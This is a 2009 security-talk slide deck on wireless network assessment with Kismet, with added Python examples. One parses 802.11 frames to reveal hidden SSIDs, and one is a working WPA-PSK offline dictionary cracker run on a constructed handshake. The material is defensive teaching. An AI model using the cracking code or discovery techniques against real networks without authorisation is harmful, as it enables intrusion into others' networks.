Assessing Wireless Security Using Open Source Tools


Speaker notes:
  • Before the Wi-Fi Alliance there was no guarantee two 802.11 devices would work together or would have all the features work together. This was seen with early implementations of WEP. Different vendors often interpret standards differently.
  • Official way clients find wireless networks. Documented in the standard. Later we will discuss other ways you can find networks.
  • Be sure to check the MD5 hash; it’s a big file that can easily get munged in transport.
  • An omni-directional antenna’s pattern is really a donut shape, but it increases reception in all the directions we care about.
  • Can buy cantennas. A 30 dBi parabolic dish is around $400, weighs 35 pounds and is about 5 feet across. Panels get fewer questions from TSA than a yagi or parabolic dish.
  • I love it when folks buy a $100 antenna but spend $5 on the cables. Some antennas do use SMA, so be sure to check before buying the pigtail.
  • The way Windows, Linux and OS X natively find open access points.
  • Limit power: can be gotten around with directional antennas. RF shielding: expensive. 802.11a: not sure if this will keep up as more and more systems come with A cards.
  • WPA uses TKIP (an RC4-based algorithm); WPA2 uses CCMP (an AES-based algorithm).

    1. Assessing Wireless Security Using Open Source Tools. By: Matthew Neely. Presented: May 5th 2009 at Pittsburgh ISSA
    2. Speaker Biography
      • Matt Neely CISSP, CTGA, GCIH, GCWN - Manager of the Profiling team at SecureState:
        • Areas of expertise include: wireless security, penetration testing, physical security, security convergence and incident response
        • Formed and ran the TSCM team at a Fortune 200 company
        • 10 years of security experience
      • Outside of work:
        • Co-host of the Security Justice Podcast
        • Board member for the North Eastern Ohio Information Security Forum
        • Licensed ham radio operator (Technician) for almost 20 years
    3. What concerns do you have about wireless?
    4. Agenda
      • Overview of the 802.11 standard
      • Hardware - Requirements and recommendations
      • Discovering wireless networks
      • Introduction to Kismet
      • Lab – Discovering and enumerating wireless networks using Kismet
      • Demo – Aircrack-ng
      • How to tell if an AP is on your network
      • Wireless security recommendations
      • Conclusion
    5. OVERVIEW OF 802.11
    6. What is 802.11
      • Set of wireless local area network (WLAN) standards developed by the IEEE
      • Carries the same upper-layer traffic as Ethernet; the AP bridges 802.11 frames onto the wired 802.3 LAN
      • Defines its own physical layer and media access control (CSMA/CA with acknowledgements, rather than Ethernet’s CSMA/CD)
    7. Popular 802.11 Standards
      • 802.11
        • 2.4 GHz
        • 2 Mbps (0.9 Mbps typical)
      • 802.11a
        • 5 GHz
        • 54 Mbps (23 Mbps typical)
      • 802.11b
        • 2.4 GHz
        • 11 Mbps (4.5 Mbps typical)
      • 802.11g
        • 2.4 GHz
        • 54 Mbps (23 Mbps typical)
      • 802.11n - Draft
        • 2.4 and 5 GHz
        • 300 Mbps (74 Mbps typical)
        • Greenfield mode
    8. 802.11 Versus Wi-Fi
      • 802.11 is a set of standards from the IEEE
      • Wi-Fi is a certification program, managed by the Wi-Fi Alliance, covering a subset of the 802.11 standards
      • Wi-Fi Alliance ensures all products with the Wi-Fi logo will work together
      • Different vendors often interpret standards differently
      • Wi-Fi Alliance defines what is the “right” thing to do when implementing a standard
        • Especially useful when vendors implement draft standards
          • Wi-Fi Protected Access (WPA)
          • “Draft” 802.11n equipment
    9. Infrastructure Vs. Ad-hoc Networks
      • Infrastructure: Allows one or more computers to connect to a network using an Access Point (AP).
        • AP is the hub of communication
        • Service Set IDentifier (SSID) is used to identify the network
      • Ad-Hoc: Allows users to create peer-to-peer networks.
        • Does not use an AP
        • Stations form an Independent Basic Service Set (IBSS), identified by an SSID and a randomly generated BSSID
        • First active ad-hoc station establishes the network and starts sending beacons for the IBSS; beaconing is then shared among the members
    11. Broadcast Probe Request
      • Client sends out broadcast probe request packets asking who is there
    12. Probe Response
      • Any AP in range that hears the request replies with a probe response carrying its SSID
    13. Direct Probe Request
      • Client can also send directed probe request packets looking for a specific network name
        • Example: I’m looking for network Linksys
    14. Beacon Packets
      • AP sends out beacon packets
        • Beacon packets contain the SSID of the network
      • Client listens for beacon packets and uses the SSID information in the packet to figure out what networks are in range
    15. Hidden APs
      • Beaconless APs
        • AKA “disabled broadcast SSID”, “cloaked” or “closed”
      • Some APs do not send beacon packets when clients are not connected
      • Other APs still send a beacon packet but leave the SSID field blank (zero length or filled with NULs)
      • Attempts to prevent malicious users from finding the AP
      • Only hides the name from active scanners: the AP still answers directed probe requests for its SSID, and the SSID is sent in the clear in probe responses and association requests whenever a legitimate client connects, so a passive listener recovers it
    16. HARDWARE
      • Requirements and Recommendations
    17. Hardware
      • Required
        • Computer - Running or capable of running Linux
          • Install Linux on a laptop
          • Use a LiveLinux distro such as BackTrack
        • Wireless card
      • Optional
        • External antenna
        • Pigtail
        • GPS
    18. BackTrack
      • LiveLinux distro containing a large number of pre-configured attack tools
      • Variety of wireless drivers come pre-loaded
      • Plug and play support for many wireless cards
      • Available in two formats:
        • Bootable CD
        • Bootable thumb drive
          • Contains more tools
          • Data written to the thumb drive persists across reboots
      • Download:
    19. BackTrack in VMware
      • When run inside VMware, BackTrack cannot directly access the host’s PCMCIA or mini-PCI wireless card
        • Limits what fun stuff can be done
      • Can pass a USB dongle with a supported chipset through to the VM
        • Temperamental and unstable at times
      • For just about everything except wireless related tasks, I run BackTrack inside VMware
      • When I need to run wireless tools in BackTrack I prefer to run BackTrack on the bare hardware
    20. Saving Data on BackTrack
      • When run from a CD all saved data will be erased on reboot
      • Solution 1:
        • Run BackTrack from a bootable thumb drive
      • Solution 2:
        • Mount a thumb drive and save your data to it
        • Command: mkdir -p /mnt/usb && mount /dev/sdb1 /mnt/usb (check dmesg for the device name your drive was given)
      • Solution 3:
        • Save your data to a network share before rebooting
    21. Wireless Card
      • Hopefully your internal wireless card works
        • Centrino or Atheros cards generally work well
        • Broadcom cards are a problem
      • Can use an external wireless card if the internal card does not work
    22. Determining What Wireless Type
      • Look up the specs for your laptop
      • Query the USB or PCI bus inside of Linux
        • lspci – Linux command that lists the devices attached to the PCI bus
          • Useful for gathering information on internal wireless cards
        • lsusb – Linux command that lists devices attached to the USB bus
    23. Example lspci Output
    24. Example lsusb Output
    25. Card Selection
      • Features to look for in an external card:
        • 1) Atheros or Ralink RT73 chipset
          • Must support RF monitor mode
          • LORCON (packet injection) support is recommended
        • 2) External antenna connector
        • 3) Form factor that matches your needs
          • PCMCIA/ExpressCard
          • USB
    26. Getting the Card You Want
      • Difficult to know what chipset a card uses
        • Manufacturers change them all the time
      • Pay close attention to model number and version
      • Buy your card from a store with a hassle-free return policy
      • Buy your card from a store that states the chipset
        • Look for stores that cater to Linux users, wardrivers and wireless hackers
    27. Card Chipset Information
      • Card chipset lists
      • BackTrack website
      • Aircrack-ng website
    28. External Antennas
      • Greatly increases range and reception
      • Useful when:
        • Performing audits from inside a vehicle
        • Triangulating the location of an AP
        • Measuring RF leakage from a building
      • Antennas are tuned to work on specific frequencies
      • Need to select antennas that are tuned to the frequency range being used
        • 2.4 GHz is the most common
          • Used by b, g and n networks
          • Same band used by Bluetooth
        • 5 GHz is needed for a and n networks
    29. Types of Antennas
      • Omni-directional
        • Increases reception in all directions
        • Magnetic mount omni-directional antennas are useful for mounting on cars
      • Directional
        • Focuses the signal like a spotlight
        • Can be used to triangulate the location of a signal
    30. Types of Directional Antennas
      • Panel
        • $20-40
        • Typical gain 8-18 dBi
        • Good for travel: compact, portable and hard to damage
      • Yagi
        • $30-50
        • Typical gain 9-15 dBi
        • Can be large
        • Typically encased in PVC pipe to protect the antenna
      • Parabolic dish
        • $30 and up
        • Very large
        • Very high gain, 19-30 dBi
        • Hard to transport
      • Waveguide (cantennas)
        • Around $50
        • Typical gain 12 dBi
    31. Antenna Recommendation
      • Get two antennas
      • Directional
        • Either a panel or small yagi
      • Omni-directional
        • Magnetic mount is very helpful if you spend time doing surveys outside a building
      • Good source:
    32. Pigtails and Adapters
      • Pigtail – Converts the small connector on the card to the connector used on the antenna
      • Do not buy cheap cables!
        • Where most signal loss occurs
        • Good quality pigtails cost around $10-20
        • Only use cable designed for use in the 2.4 or 5 GHz range
      • Pigtails should probably end in an N-type male connector
        • Most antennas have an N-type female connector
      • Good source:
      • Pictures of common Wi-Fi antenna connectors:
    33. GPS
      • Allows data to be placed onto a map for analysis
      • Only get an NMEA compatible GPS
      • Interface type:
        • Serial: Does not require a driver and just about always works
        • USB: Requires drivers which can be tricky in Linux
        • Bluetooth: Avoid because it operates in the 2.4 GHz spectrum and interferes with what you are trying to measure
      • If you run Linux and do not have a serial port, the safest option is a serial GPS and a USB-to-serial adaptor
        • Buy a USB adaptor that is Linux friendly
    35. Active Network Discovery
      • Official way to find networks
      • Client sends out a broadcast probe request looking for networks
      • Client listens for beacon packets from APs
      • Cons:
        • Requires the client to be within transmission range of the AP (the AP has to hear the probe)
        • Cannot find beaconless/hidden networks
        • Announces the scanner’s presence on the air
      • Pros:
        • Every wireless card supports this method
        • Does not require a card or driver that supports RF monitor mode
      • Windows tools such as NetStumbler use active network discovery
    36. Passive Network Discovery
      • Card listens to the airwaves and extracts information about the networks in the area from the packets it sees
      • Requires cards that support RF monitor mode
        • Not all cards and drivers support RF monitor mode
      • Pros:
        • Client only needs to be within receiving range
        • Can detect networks with the beacon turned off
        • Can gain more information about the network
        • Transmits nothing, so the target cannot detect the scan
      • Cons:
        • Requires a card and driver that supports full RF monitor mode
        • No free Windows program supports passive network discovery
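The beacon, probe request and probe response handling described on slides 11 through 15 and the difference between active and passive discovery on slides 35 and 36, as an added example that is not part of the original talk and is not Kismet’s code: a minimal parser for 802.11 management frames run over three constructed frames (made-up BSSID 00:11:22:33:44:55, client 66:77:88:99:aa:bb and SSID “CorpNet”). An active scan sees only a nameless network from the cloaked beacon; a passive listener recovers the SSID from the probe response and also sees which network the client was asking for.

```python
import struct

# All frames below are constructed for this example (made-up MACs and SSID),
# not captured traffic. They follow the real 802.11 management frame layout:
# 24-byte header, then (for beacons and probe responses) 12 bytes of fixed
# fields, then tagged information elements (IEs): tag, length, value.

AP_BSSID = bytes.fromhex("001122334455")   # hypothetical AP
CLIENT = bytes.fromhex("66778899aabb")     # hypothetical station
BROADCAST = b"\xff" * 6

SUBTYPE_PROBE_REQ, SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 4, 5, 8
TAG_SSID, TAG_DS_PARAMS = 0, 3


def mac(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes) -> bytes:
    # Frame control: version 0, type 0 (management), subtype in the high nibble, no flags.
    fc = bytes([subtype << 4, 0x00])
    duration, seq_ctrl = b"\x00\x00", b"\x00\x00"
    return fc + duration + da + sa + bssid + seq_ctrl + body


def ap_frame(subtype: int, da: bytes, ssid: bytes) -> bytes:
    """Beacon or probe response from AP_BSSID: timestamp, beacon interval, capabilities, then IEs."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    return mgmt_frame(subtype, da, AP_BSSID, AP_BSSID,
                      fixed + ie(TAG_SSID, ssid) + ie(TAG_DS_PARAMS, b"\x06"))


def client_probe(ssid: bytes) -> bytes:
    """Directed probe request: no fixed fields, IEs start right after the header."""
    return mgmt_frame(SUBTYPE_PROBE_REQ, BROADCAST, CLIENT, BROADCAST, ie(TAG_SSID, ssid))


def parse(frame: bytes):
    """Return (subtype, sa, bssid, ssid) for beacons, probe requests and probe
    responses, else None. ssid is None when the SSID IE is missing, zero-length
    or all NULs, which is how a 'cloaked' AP beacons."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in (SUBTYPE_BEACON, SUBTYPE_PROBE_REQ, SUBTYPE_PROBE_RESP):
        return None
    sa, bssid = frame[10:16], frame[16:22]
    body = frame[24:]
    if subtype != SUBTYPE_PROBE_REQ:
        body = body[12:]                       # skip timestamp / interval / capability
    ssid = None
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:                # truncated IE: stop, do not trust the rest
            break
        if tag == TAG_SSID and value.strip(b"\x00"):
            ssid = value.decode("utf-8", "replace")
        i += 2 + length
    return subtype, sa, bssid, ssid


def active_scan(frames):
    """What a NetStumbler-style scan reports: only what beacons advertise."""
    seen = {}
    for frame in frames:
        parsed = parse(frame)
        if parsed and parsed[0] == SUBTYPE_BEACON:
            seen[mac(parsed[2])] = parsed[3]
    return seen


def passive_scan(frames):
    """What a monitor-mode scanner such as Kismet does: beacons create the
    network entry (flagged cloaked if nameless), probe responses from the same
    BSSID fill in the name, and directed probe requests show what clients want."""
    networks, probed = {}, {}
    for frame in frames:
        parsed = parse(frame)
        if parsed is None:
            continue
        subtype, sa, bssid, ssid = parsed
        if subtype == SUBTYPE_PROBE_REQ:
            if ssid:
                probed.setdefault(mac(sa), set()).add(ssid)
            continue
        entry = networks.setdefault(mac(bssid), {"ssid": None, "cloaked": False})
        if subtype == SUBTYPE_BEACON and ssid is None:
            entry["cloaked"] = True
        if ssid:
            entry["ssid"] = ssid
    return networks, probed


# Constructed capture: cloaked beacon, client asking for the hidden name, AP answering it.
CAPTURE = [
    ap_frame(SUBTYPE_BEACON, BROADCAST, b""),
    client_probe(b"CorpNet"),
    ap_frame(SUBTYPE_PROBE_RESP, CLIENT, b"CorpNet"),
]

if __name__ == "__main__":
    print(active_scan(CAPTURE))
    print(passive_scan(CAPTURE))
```

The parser stops at the first truncated IE instead of reading past the end, which is the kind of malformed frame a real capture will contain; a scanner that trusts the length byte blindly is itself a target.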
    37. Kismet
      • Passive scanner
      • OS: Linux and other Unix systems
      • Kismet is really two programs
        • kismet_server: Collects the packets
        • kismet_client: User interface
      • Pros:
        • Will find hidden networks
        • GPS support
      • Cons:
        • Complicated installation and configuration
    38. Kismet Classic Versus Newcore
      • “Classic” is the present stable release of Kismet
      • Kismet-newcore is a rewrite of Kismet
        • Still under development
        • Supports plugins
          • Example: DECT support
      • Avoid newcore unless you have a specific reason to use it or like to tinker
    39. Configuring Kismet
      • Configuration file is usually located at /usr/local/etc/kismet.conf
      • Specify suiduser (the unprivileged user Kismet drops to once the capture source is open)
        • suiduser=<normal non-root user>
        • Ex: suiduser=matt
      • Packet source
        • source=<driver,interface,name>
        • Ex: source=madwifi_g,ath0,AtherosCard
      • Skip these steps on BackTrack
        • Use the -c flag when starting the server to tell it the packet source
        • Ex: kismet_server -c madwifi_g,wifi0,CiscoCard
    40. Source Settings - Driver
      • Run airmon-ng to determine which driver your wireless card is using
        • Part of the Aircrack-ng suite
        • # airmon-ng
        • $ sudo airmon-ng
    41. Source Settings - Interface
      • Run airmon-ng or iwconfig to see all the wireless interfaces
        • # iwconfig
        • $ iwconfig
    43. Accessing the Lab Server
      • Connect to wireless network
        • Lab-Connect_Here
      • Windows Telnet:
        • Start -> Run -> cmd.exe
        • telnet -t vt100
      • SSH (PuTTY or other SSH client)
        • Connect to
      • Once connected, log in
        • Username: kismet
        • Password: kismet
    44. DEMO: AIRODUMP-NG
    45. How to Tell if an AP is on Your Network
      • Direction/Location
        • GPS
        • Use a directional antenna
      • Connect to the network and check:
        • If a traceroute shows the traffic traversing your network
        • If you can contact an internal server
        • DNS server address
      • Do not rely on the assigned IP address
        • A neighbor’s AP can hand out the same private (RFC 1918) range you use, and a rogue AP doing NAT hides your addressing entirely
    47. General Security Recommendations
      • Make the network difficult to find
        • Limit AP power output
        • Use RF shielding to prevent RF leakage
        • Only use 802.11a APs
      • Do not use hidden APs
        • Could make it easier to attack your wireless Windows clients
          • Clients configured for a hidden network must probe for it by name wherever they are, leaking the SSID
          • Windows prefers visible networks over hidden networks
          • Attackers can answer those probes from a malicious AP and trick users into connecting to it
      • MAC filtering
        • Not recommended
        • Easy to bypass (MAC addresses are sent in the clear and are trivially spoofed) and adds a lot of complexity in a large environment
        • Minimal level of protection is generally not worth the effort
    48. Wireless IDS
      • Consider deploying a wireless IDS
      • Can detect:
        • De-auth attacks
        • RTS/CTS denial of service attacks
        • Rogue APs
          • Both on and off your network
      • Remember IDS is only detection and not prevention
      • Be very careful with wireless IPS
        • An IPS that de-auths clients from “rogue” APs could end up attacking neighboring networks
    49. Wireless Encryption and Authentication
      • Do not use WEP
      • Migrate from LEAP
        • Known weaknesses and attack tools for LEAP (its MS-CHAP exchange allows an offline dictionary attack on the password)
        • If you cannot migrate from LEAP be sure you enforce a strong password policy
      • Use WPA or WPA2
        • Prefer WPA2 (CCMP/AES); WPA’s TKIP is RC4-based and already has published partial attacks
        • Both can be secured fairly well
    50. WPA-PSK Recommendations
      • WPA-PSK (Pre-Shared Key)
      • AKA WPA Personal or WPA Home
      • Choose a long and complex passphrase
        • Prevents brute-force attacks from tools like coWPAtty: anyone who captures one client’s 4-way handshake can test passphrases offline, and the standard only requires 8 characters
      • Choose a unique SSID
        • The PSK is derived from the passphrase with the SSID as the salt (PBKDF2, 4096 rounds), so precomputed tables only work for the SSID they were built for; tables for common SSIDs such as “linksys” are already available
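To make the two WPA-PSK recommendations concrete, an added example that is neither the speaker’s code nor coWPAtty’s, implementing the IEEE 802.11i derivations such tools rely on: PMK from passphrase and SSID via PBKDF2-HMAC-SHA1, PTK via PRF-512, and the message 2 EAPOL-Key MIC. The passphrase “sunshine1”, the SSIDs “linksys” and “CorpNet-7f3a”, the MAC addresses, nonces and wordlist are all constructed, and the handshake is built here rather than captured. The PBKDF2 step can be checked against the 802.11i test vector (passphrase “password”, SSID “IEEE”).

```python
import hashlib
import hmac
import struct

# Constructed inputs for this example (made-up passphrase, SSIDs, MACs, nonces);
# nothing here comes from a real capture. The key derivation and MIC computation
# follow IEEE 802.11i, which is what coWPAtty and aircrack-ng implement.


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits).
    The SSID is the salt, which is why a precomputed table is bound to one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from PMK, AP MAC (aa), client MAC (spa) and both handshake nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # 4-byte EAPOL header + EAPOL-Key fields preceding the 16-byte Key MIC


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    WPA2/CCMP uses HMAC-SHA1 truncated to 128 bits; WPA/TKIP would use HMAC-MD5."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Message 2 of the 4-way handshake as a legitimate supplicant would send it.
    Stands in for a capture: this one frame (plus both nonces and MACs) is all an attacker needs."""
    key_info = 0x010a  # pairwise key, MIC present, key descriptor version 2 (HMAC-SHA1)
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 16, 1) + snonce   # descriptor type, key info, key length, replay counter, SNonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))  # IV, RSC, ID, MIC (zero), key data length
    eapol = bytes([1, 3]) + struct.pack(">H", len(body)) + body            # EAPOL v1, type 3 (EAPOL-Key)
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": eapol}


def pmk_table(wordlist, ssid):
    """What genpmk precomputes: one PMK per candidate word for a single SSID.
    This is the expensive step (4096 HMACs per word); everything after it is cheap."""
    return {word: wpa_pmk(word, ssid) for word in wordlist}


def crack(handshake, table):
    """Offline dictionary attack: derive the KCK from each candidate PMK and
    compare the recomputed MIC with the captured one."""
    h = handshake
    captured_mic = h["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word, pmk in table.items():
        kck = wpa_ptk(pmk, h["aa"], h["spa"], h["anonce"], h["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, h["eapol"]), captured_mic):
            return word
    return None


AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # hypothetical AP and client
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))                 # fixed stand-ins for random nonces
WORDLIST = ["password", "letmein", "sunshine1", "linksys", "welcome1"]


def demo():
    """Same weak passphrase on a default SSID and on a unique one, attacked with a table built for 'linksys'."""
    default_ssid = make_handshake("sunshine1", "linksys", AA, SPA, ANONCE, SNONCE)
    unique_ssid = make_handshake("sunshine1", "CorpNet-7f3a", AA, SPA, ANONCE, SNONCE)
    table = pmk_table(WORDLIST, "linksys")
    return (crack(default_ssid, table),                               # table matches: passphrase recovered
            crack(unique_ssid, table),                                # table built for the wrong SSID: None
            crack(unique_ssid, pmk_table(WORDLIST, "CorpNet-7f3a")))  # rebuilt table: recovered again


if __name__ == "__main__":
    print(demo())
```

A table built for “linksys” recovers the passphrase immediately on the default-SSID network, fails on the unique SSID, and has to be rebuilt at 4096 HMAC-SHA1 operations per candidate before the unique-SSID network falls. A unique SSID only removes the precomputation shortcut; a passphrase that is not in any wordlist is what actually defeats the attack.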
    51. WPA Enterprise Recommendations
      • Generally more secure than WPA-PSK
        • Also more complex
      • Requires a RADIUS server
      • Use an authentication type that provides mutual authentication
      • With PEAP and EAP-TTLS ensure the client is properly configured: it must validate the RADIUS server’s certificate and accept only your CA and server name, otherwise a rogue AP with its own RADIUS server can harvest credentials
      • Consider using two-factor authentication
    52. Conclusion
      • Kismet and the Aircrack-ng suite are free tools that can be used to locate wireless networks
      • Selecting the right card is critical when using Kismet
      • Finding N Greenfield mode networks could be a challenge in the future
      • Do not use WEP to secure a wireless network
      • Use WPA2 Enterprise with multi-factor authentication
      • Ensure the wireless client is properly configured and secured
    53. QUESTIONS?
      • More Information: